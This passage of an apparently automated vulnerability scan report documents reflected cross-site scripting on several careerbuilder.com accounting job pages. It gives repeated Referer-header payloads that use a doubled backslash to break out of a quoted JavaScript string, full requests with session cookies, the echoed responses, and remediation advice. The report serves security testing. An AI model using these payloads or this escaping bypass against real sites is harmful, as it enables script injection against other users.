Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR12
Date: Sun, 14 Nov 2010 23:15:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ffdf8\\';alert(1)//964dda6ef0c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd21d\'%3balert(1)//0eb9870a374 was submitted in the Referer HTTP header. This input was echoed as cd21d\\';alert(1)//0eb9870a374 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cd21d\'%3balert(1)//0eb9870a374
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174943
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR30
Date: Sun, 14 Nov 2010 23:00:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cd21d\\';alert(1)//0eb9870a374'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0bd\'%3balert(1)//90fb2f6d989 was submitted in the Referer HTTP header. This input was echoed as cd0bd\\';alert(1)//90fb2f6d989 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cd0bd\'%3balert(1)//90fb2f6d989
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175006
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR24
Date: Sun, 14 Nov 2010 23:00:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cd0bd\\';alert(1)//90fb2f6d989'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7b1\'%3balert(1)//e155036bc0b was submitted in the Referer HTTP header. This input was echoed as cc7b1\\';alert(1)//e155036bc0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cc7b1\'%3balert(1)//e155036bc0b
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174997
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:17:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cc7b1\\';alert(1)//e155036bc0b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e2e4\'%3balert(1)//02aca8e575c was submitted in the Referer HTTP header. This input was echoed as 2e2e4\\';alert(1)//02aca8e575c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=2e2e4\'%3balert(1)//02aca8e575c
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174727
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR42
Date: Sun, 14 Nov 2010 23:17:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2e2e4\\';alert(1)//02aca8e575c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64fde\'%3balert(1)//5d5df63807f was submitted in the Referer HTTP header. This input was echoed as 64fde\\';alert(1)//5d5df63807f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Auditing.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=64fde\'%3balert(1)//5d5df63807f
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174783
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR17
Date: Sun, 14 Nov 2010 23:00:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 64fde\\';alert(1)//5d5df63807f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faa8\'%3balert(1)//21801b86e96 was submitted in the Referer HTTP header. This input was echoed as 8faa8\\';alert(1)//21801b86e96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=8faa8\'%3balert(1)//21801b86e96
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174808
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 23:00:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 8faa8\\';alert(1)//21801b86e96'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8edb\'%3balert(1)//31cc3c490aa was submitted in the Referer HTTP header. This input was echoed as e8edb\\';alert(1)//31cc3c490aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=e8edb\'%3balert(1)//31cc3c490aa
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174915
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:17:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - e8edb\\';alert(1)//31cc3c490aa'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b3\'%3balert(1)//ea15dcf09e0 was submitted in the Referer HTTP header. This input was echoed as 204b3\\';alert(1)//ea15dcf09e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=204b3\'%3balert(1)//ea15dcf09e0
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174914
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL30
Date: Sun, 14 Nov 2010 23:24:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 204b3\\';alert(1)//ea15dcf09e0'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcce7\'%3balert(1)//9598df8cd85 was submitted in the Referer HTTP header. This input was echoed as bcce7\\';alert(1)//9598df8cd85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CPA.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=bcce7\'%3balert(1)//9598df8cd85
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174487
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR14
Date: Sun, 14 Nov 2010 23:18:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bcce7\\';alert(1)//9598df8cd85'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33186\'%3balert(1)//aae926feec9 was submitted in the Referer HTTP header. This input was echoed as 33186\\';alert(1)//aae926feec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
